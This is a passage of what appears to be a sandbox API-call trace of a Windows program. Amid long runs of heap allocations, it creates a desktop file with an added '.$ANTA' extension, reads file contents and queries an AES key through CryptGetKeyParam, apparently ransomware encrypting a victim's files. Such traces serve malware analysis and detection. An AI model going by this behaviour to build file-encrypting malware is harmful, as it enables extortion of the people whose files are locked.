hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.646] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\jhcqtc-oyo hp07enj.ots.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.647] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0123.647] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.650] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0123.650] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xd6ba, lpOverlapped=0x0) returned 1 [0123.652] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0123.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0123.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0123.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.654] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.655] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.655] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.655] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0123.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.657] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.657] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0123.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0123.659] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0123.660] CryptGetKeyParam (in: hKey=0x41ac500, dwParam=0x7, pbData=0x43e2800, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2800*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0123.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0123.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0123.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: 